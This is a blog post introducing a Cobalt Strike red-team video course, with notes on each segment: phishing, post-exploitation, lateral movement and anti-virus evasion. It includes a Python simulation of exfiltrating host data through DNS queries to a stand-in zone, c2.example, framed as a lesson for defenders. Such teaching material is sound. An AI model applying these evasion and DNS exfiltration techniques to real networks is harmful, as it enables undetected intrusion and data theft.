A few days ago, I posted the YouTube playlist on Twitter and it’s made a few rounds. That’s great. This blog post properly introduces the course along with a few notes and references for each segment.
Tradecraft is a new nine-part course that provides the background and skills needed to execute a targeted attack as an external actor with Cobalt Strike. I published this course to help you get the most out of the tools I develop.
If you’d like to jump into the course, it’s on YouTube:
http://www.youtube.com/playlist?list=PL9HO6M_MU2nesxSmhJjEvwLhUoHPHmXvz
Here are a few notes to explore each topic in the course with more depth.
1. Introduction
The first part of Tradecraft introduces the course, the Metasploit Framework, and Cobalt Strike. If you already know Armitage or the Metasploit Framework, you don’t need to watch this segment. The goal of this segment is to give Metasploit Framework novices the background and vocabulary they need to follow the rest of the course.
To learn more about the Metasploit Framework:
Targeted Attacks and Advanced Persistent Threat:
- Read Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains (Hutchins, Cloppert, and Amin, Lockheed Martin). The process in this course maps well to the “systematic process to target and engage an adversary” presented in this paper. If you need to exercise controls that detect, deny, disrupt, degrade, or deceive an adversary, I know a product that can help 🙂
- Watch Michael Daly’s 2009 USENIX talk, The Advanced Persistent Threat. This talk pre-dates the marketing bonanza over APT actors and their work. This is a common sense discussion of the topic without an agenda. Even though it’s from 2009, the material is spot on.
- Watch Kevin Mandia’s 2014 RSA talk, State of the Hack: One Year After the APT1 Report. This is a 20 minute summary of the APT1 report published by Mandiant in February 2013.
Advanced Persistent Threat Campaigns
These actors managed to compromise thousands of hosts and steal data from them for years, without detection. Cobalt Strike’s aim is to augment the Metasploit Framework to replicate these types of threats.
2. Basic Exploitation (aka Hacking circa 2003)
Basic Exploitation introduces the Metasploit Framework and how to use it through Cobalt Strike. I cover how to pick a remote exploit, brute force credentials, and pivot through SSH. I call this lecture “hacking circa 2003” because remote memory corruption exploits have little use in an environment with a handle on patch management. Again, if you have strong Metasploit-fu, you may skip this lecture.
A few notes:
- I dismiss remote memory corruption exploits as a dated vector, but don’t discount the remote attack surface. HD Moore and Val Smith’s Tactical Exploitation is one of the best resources on how to extract information from exposed services. First published in 2007, it’s still relevant. Watch the video and read the paper.
- I used the Metasploitable 2 Virtual Machine for the Linux demonstrations in this segment.
3. Getting a Foothold
This segment introduces how to execute a targeted attack with Cobalt Strike. We cover client-side attacks, reconnaissance, and crafting an attack package.
To go deeper into this material:
4. Social Engineering
The fourth installment of Tradecraft covers how to get an attack package to a user. It explores physical media as an attack vector, as well as watering hole attacks, one-off phishing sites, and spear phishing.
- Watch Advanced Phishing Tactics by Martin Bos and Eric Milam. This talk puts together a lot of concepts needed for a successful phish. How to harvest addresses, develop a good pretext, and create a phishing site.
- Advanced threat actors favor spear phishing as an access vector. I’d point you to one source, but since this concept has so much market buzz, there are a lot of whitepapers on the topic. I suggest a Google search and reading something from a source you consider credible.
5. Post Exploitation with Beacon
By this time, you know how to craft and deliver an attack package. Now, it’s time to learn how to setup Beacon and use it for asynchronous and interactive operations.
- Read Beacon – An Operator’s Guide for a summary of everything Beacon related.
- A lot of people claim “that’ll never work, we don’t allow port 53 out” when I bring up Beacon’s DNS communication capability. They’re kind of… wrong. Blocking direct outbound port 53 from workstations doesn’t matter: the workstation asks the internal DNS server, which recursively resolves the name on its behalf, so the query still reaches the attacker’s authoritative name server. The linked post goes into why.
- Watch Dirty Red Team Tricks II to get an idea of how asynchronous C2 (e.g., beaconing) can complement interactive C2.
- After this course was recorded, Beacon added the ability to communicate peer-to-peer over SMB named pipes. I recommend studying up on this feature.
- Beacon’s command and control traffic is Malleable. This means you may redefine its indicators to look like other malware.
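The DNS point above is easier to see in code. The following is an added illustration written for this post, not Cobalt Strike’s or Beacon’s own code: it models a perimeter that only lets the internal resolver talk to the Internet on port 53, encodes a payload into legal DNS names (63-octet labels, 253-octet names) under a hypothetical attacker zone, and shows that the authoritative server still recovers the data, and only ever sees the resolver’s address. The IP addresses, the zone name `c2.example`, and the `<seq>.<label>.<label>.<zone>` layout are all constructed for this example.

```python
import base64

LABEL_MAX = 63   # RFC 1035: a label is at most 63 octets
NAME_MAX = 253   # RFC 1035: a name in text form is at most 253 octets
DATA_LABELS = 2  # data labels carried per query name (layout chosen for this example)

RESOLVER_IP = "10.0.0.53"     # constructed: the site's recursive resolver
WORKSTATION_IP = "10.0.5.17"  # constructed: the compromised workstation


def egress_allowed(src_ip: str, dport: int) -> bool:
    """The perimeter rule the 'we block 53 out' objection describes: only the
    internal resolver may reach the Internet on port 53."""
    if dport == 53:
        return src_ip == RESOLVER_IP
    return True


def encode_names(data: bytes, zone: str) -> list[str]:
    """Split data into legal DNS names under zone: <seq>.<label>.<label>.<zone>.
    Unpadded, lower-cased base32 keeps every label alphanumeric and survives
    case-insensitive resolvers."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    per_name = LABEL_MAX * DATA_LABELS
    names = []
    for seq, start in enumerate(range(0, len(text), per_name)):
        piece = text[start:start + per_name]
        labels = [piece[i:i + LABEL_MAX] for i in range(0, len(piece), LABEL_MAX)]
        name = ".".join([str(seq), *labels, zone])
        assert len(name) <= NAME_MAX, "zone too long for this layout"
        names.append(name)
    return names


class AttackerNameServer:
    """Authoritative server for the hypothetical zone. It only ever hears from
    resolvers, never from the workstation, which is why the perimeter rule
    does not help."""

    def __init__(self, zone: str):
        self.zone = zone
        self.chunks: dict[int, str] = {}
        self.sources: set[str] = set()

    def query(self, name: str, src_ip: str) -> str:
        self.sources.add(src_ip)
        labels = name.split(".")
        zone_labels = self.zone.count(".") + 1
        seq, data = int(labels[0]), "".join(labels[1:-zone_labels])
        self.chunks[seq] = data
        return "0.0.0.0"  # the answer is irrelevant; the question carried the data

    def reassemble(self) -> bytes:
        """Reorder by sequence number (UDP queries may arrive out of order),
        restore base32 padding and decode."""
        text = "".join(self.chunks[k] for k in sorted(self.chunks)).upper()
        text += "=" * (-len(text) % 8)
        return base64.b32decode(text)


class InternalResolver:
    """The site's recursive resolver: it looks names up on the client's behalf."""

    def __init__(self, ip: str, upstream: AttackerNameServer):
        self.ip, self.upstream = ip, upstream

    def resolve(self, name: str) -> str:
        assert egress_allowed(self.ip, 53)  # the resolver is the one host allowed out
        return self.upstream.query(name, src_ip=self.ip)


class Workstation:
    def __init__(self, ip: str, resolver: InternalResolver):
        self.ip, self.resolver = ip, resolver

    def direct_query(self, server: AttackerNameServer, name: str) -> str:
        """What the objection assumes the implant must do; the perimeter stops it."""
        if not egress_allowed(self.ip, 53):
            raise PermissionError("direct outbound 53 blocked at the perimeter")
        return server.query(name, src_ip=self.ip)

    def lookup(self, name: str) -> str:
        """The normal OS resolution path, which the perimeter rule never touches."""
        return self.resolver.resolve(name)


def run_demo(payload: bytes, zone: str = "c2.example") -> tuple[bytes, set[str]]:
    """Send payload through the resolver; return what the attacker recovered and
    which source addresses the attacker's server saw."""
    ns = AttackerNameServer(zone)
    ws = Workstation(WORKSTATION_IP, InternalResolver(RESOLVER_IP, ns))
    for name in encode_names(payload, zone):
        ws.lookup(name)
    return ns.reassemble(), ns.sources


if __name__ == "__main__":
    recovered, seen_by_attacker = run_demo(b"hostname=WS17;user=jdoe")
    print(recovered, seen_by_attacker)
```

The model deliberately leaves out what a real implementation has to handle: resolver caching (a repeated name is answered from cache and never leaves the network, so names must be unique), forwarders between the resolver and the Internet, and the downstream channel carried in answers. The point it does make is the one the objection misses: the control that matters is what the recursive resolver is allowed to resolve and for whom, not whether workstations can reach port 53 directly.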
6. Post Exploitation with Meterpreter
This video digs into interactive post-exploitation with Meterpreter. You will learn how to use Meterpreter, pivot through the target’s browser, escalate privileges, pivot through the compromised host, and run external tools through that pivot.
7. Lateral Movement
This installment covers lateral movement. You’ll learn how to enumerate hosts and systems with built-in Windows commands, steal tokens, interrogate hosts to steal data, and use nothing but Windows commands to compromise a fully-patched system by abusing trust relationships. My technical foundation is very Linux heavy; I wish this lecture had existed when I was refreshing my skillset.
Token Stealing and Active Directory Abuse
Pass the Hash
8. Offense in Depth
This segment dissects the process of getting a foothold in terms of the defenses you’ll encounter along the way. You’ll learn how to avoid or get past defenses that prevent message delivery, prevent code execution, and detect or stop command and control.
- If you like, you may use Cortana to force Armitage or Cobalt Strike to use an AV-safe executable of your choosing. You can also pick an EXE by hand in Cobalt Strike’s dialogs, but scripting it with Cortana lets you generate a fresh executable automatically for each set of payload parameters.
- Also, check out Veil, a framework for generating anti-virus safe executables.
- Here’s a blog post by funoverip.net on how to modify a client-side exploit to get past an anti-virus product.
Offense in Depth
9. Operations
This last chapter covers operations. Learn how to collaborate during a red team engagement, manage multiple team servers from one client, and load scripts to help you out.
The online course does not have dedicated labs per se. I have two sets of labs I run through with this material.
When I’m hired to teach, I bring a Windows enterprise in a box. I have my students conduct several drills to get familiar with the tools. I then drop them into my enterprise environment and assign goals for them to go through.
I also have a DVD with labs that map to the old version of this course. This DVD has two Linux target virtual machines and an attack virtual machine. Nothing beats setting up a Windows environment to play with these concepts, but this DVD isn’t a bad starter. If you see me at a conference, ask for one.